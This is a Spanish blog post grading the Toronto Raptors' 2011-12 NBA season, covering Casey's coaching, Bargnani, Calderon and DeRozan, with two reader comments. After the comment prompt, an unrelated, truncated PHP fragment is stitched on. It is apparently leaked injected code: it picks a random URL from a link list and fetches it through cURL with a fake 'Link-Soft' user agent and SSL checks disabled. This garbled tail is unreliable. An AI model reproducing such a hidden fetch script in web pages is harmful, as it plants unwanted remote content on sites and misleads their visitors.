Toronto Raptors: Suspenso

02 de July de 2012 por txusma

Los Raptors empezaron el año con una plantilla prácticamente idéntica a la que solo había sido capaz de ganar 22 partidos el año anterior. Poquitas cosas tenían los aficionados para ilusionarse, como mucho las posibles mejoras de Demar DeRozan y Ed Davis.

Olvidaban los fans canadienses que en realidad sí que se había producido un cambio importante en la estructura de la franquicia: Jay Triano había sido sustituído por Dwane Casey. Es curioso como subestimamos en ocasiones a algunos entrenadores de la NBA. A todos se nos llena la boca con los Phil Jackson, Doc Rivers, Jerry Sloan, Greg Popovic, etc., pero tendemos a olvidar las pequeñas victorias que consiguen entrenadores menos reconocidos como el entrenador de los Jazz, Terell Corbyn, o el mismo Casey. El ex de los Mavs, que venía con un anillo en la mano, llegó a los Raptors con una idea clara: transformar a este grupo de perdedores en un equipo competitivo. A pesar de lo que pueda decir el balance, creo que lo ha conseguido, o al menos ha puesto las cimientos para seguir creciendo en ese sentido en años venideros.

Los jugadores de los Raptors han bajado el culo y se han puesto a defender y competir. Han perdido muchos partidos por pura mala suerte y han peleado la mayoría hasta el final. Posiblemente, si Andrea Bargnani no se hubiera lesionado a finales de Enero, su balance sería bastante mejor y quien sabe si hubieran podido peleado por ese octavo puesto que da acceso a los Playoffs. El italiano empezó la temporada a nivel All-Star, anotando 24 puntos y capturando más de 6 rebotes por noche. Incluso parecía que de repente alguien le  había insuflado sangre en las venas y había perdido el miedo a defender a los interiores rivales. Con él en pista, el balance de los Raptors fue de 13-18, sin él, de 10-23. La diferencia entre salir con Bargnani de titular o salir con Aaron Gray es descomunal.

Jose Calderon también ha jugado una buena temporada. A pesar de los rumores de amnistía que corren por Toronto, el español puede sentirse satisfecho de su trabajo. Ha anotado 10 puntos por partido y ha repartido casi 9 asistencias, un número estratosférico teniendo en cuenta los compañeros que recibían esas asistencias. Sus compañeros en las alas, DeRozan y Johnson, no son precisamente unos hachas tirando desde fuera. Este año, incluso parece haber mejorado la defensa del español. Nunca será un Sefolosha pero su inteligencia y unas piernas descansadas le han servido para no convertirse en el coladero que venía siendo.

Si podríamos decir que Bargnani y Calderon han sido las sorpresas positivas, los 2 jugadores que a priori estaban llamados a dar un paso adelante han sido los que más han decepcionado. A Ed Davis le ha pasado su falta de físico y su inconsistencia a ambos lado de la pista y en ningún momento ha estado en disposición de discutirle la titularidad a un voluntarioso Amir Johnson. Lo preocupante de su caso es que parece un jugador que necesita muchos minutos para mejorar y con Bargnani, Valanciunas y el propio Amir en el equipo, no parece que vaya a tenerlo fácil. De todos modos la gran decepción ha sido el Demar DeRozan, el amigo de Sancho. A principio de temporada, y ya totalmente desengañados con Bargnani, muchos apuntábamos al ex de USC, como el próximo “jugador franquicia” de los Raptors. Todavía le queda mucho futuro por delante pero su rendimiento, con toda la atención puesta en su figura, ha dejado bastante que desear. Cuando el jugador que a priori ha de llevar el peso del juego ofensivo solo es capaz de anotar el 42% de sus tiros de campo y el 26% de los tiros es que tenemos un problema. Y aún tenemos un problema mayor si este jugador tampoco asiste y rebotea en demasía. Mirándolo fríamente, sus números, teniendo en cuenta que es un jugador de tercer año, no son tan malos, pero las expectativas eran elevadas que no podemos evitar sentirnos un tanto engañados. Vamos a darle un par de añitos más, a ver si se pone a entrenar fuerte su tiro exterior.

Los Raptors empezaban la temporada sin objetivos concretos, como los Pistons, pero con mucho trabajo por delante. Si los primeros partidos del curso no fueron un espejismo, Dwane Casey había conseguido que sospechosos habituales como Barganani y Calderon defendieran aceptablemente y que su equipo fuera competitivo hasta los últimos segundos. Me parece un avance más que interesante respecto la temporada pasada y creo que tienen mucho que mejorar en la temporada que se presenta. No obstante, el balance manda y con solo 23 victorias no podemos aprobar su temporada.

Lo mejor: El inicio de temporada de Andrea Bargnani. El liderazgo y saber de estar de Jose Calderon. El nuevo espíritu que Dwane Casey ha insuflado a este equipo. Que llega Jonas Valanciunas.

Lo peor: El paso atrás de Ed Davis y la no-confirmación de Demar DeRozan como jugador realmente importante. Que han jugado con Aaron Gray de titular en 40 partidos.

Jugando a ser GM:

– Se habla mucho de amnistiar a Calderon para traerse a Steve Nash pero, romanticimos aparte, tampoco le encuentro mucho sentido. Al español le queda un solo año de contrato, y todos sabemos lo jugosos que pueden llegar a ser los expirings. Además, Calderon no es un 0 a la izquierda como lo podía ser Gilbert Arenas o Rashard Lewis. Teniendo en cuenta que a estos Raptors les queda un año o dos más de cocerse a fuego lento, ¿para qué cambiarlo por Steve Nash?

– Tony Wroten llega para dar descanso tanto al base como al escolta titular del equipo. Es un jugador que pueda rendir desde ya mismo, alto para su posición y muy fuerte. Desgraciadamente, el tiro exterior tampoco es su fuerte. Parece la firma necesaria para jugar en los Raptors.

– Llega también Jonas Valanciunas, un jugador que tiene muy ilusionados a los canadienses. Dejémosle un año para aclimatarse e ir ganando confianza. Aquí hay jugador.

– No creáis que me movería mucho más. Seguramente me ganaría un titular similar como el del análisis de principio de temporada. Alguien me tacharía de estático o cobarde pero creo hace falta al menos un año más para que el estilo Casey acabe de impregnar bien la filosofía del equipo. Cuando acabe el año, Calderon acabará su contrato (¿lo podríamos renovar barato?) y tendríamos hueco para ir a por algún agente libre realmente interesante.

Comenta

2 comentarios a esta entrada

  1. Vader dice:
    #1

    Y a ver como responde el nuevo rookie, Terrence Ross. Este SG creo que si tiene un tiro exterior bueno.

    Saludos

      Citar

  2. Sancho88 dice:
    #2

    Buenísimo análisis Txus. Pues sí, teniendo en cuenta los últimos años tras la salida de Bosh, se puede decir que el equipo al menos ha recuperado el norte. En las entrevistas Casey parece un tío muy cabal que sabe perfectamente lo que quiere hacer con este equipo. Valanciunas y Bargnani pueden formar una pareja espectacular, y además el lituano aportará defensa, lo ideal para estos Raptors. A ver como se entienden Ross y DeRozan, sobre todo a ver si alguien empieza a enchufarlas desde fuera, y yo renovaría a Calderón o al menos no lo amnistiaría y esperaría a que acabase su contrato. La amnistía sería de tontos. Si quieres a Nash, ok, fíchalo, pero no tires el contrato de Calderón, intenta sacar algo por él, aunque sean rondas de draft. Yo creo que se lo podrían encasquetar a equipos que volverán a fracasar este año como Bobcats, Cavaliers o Pistons y tener así algún top 10 para el año que viene, a poder ser un tirador…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>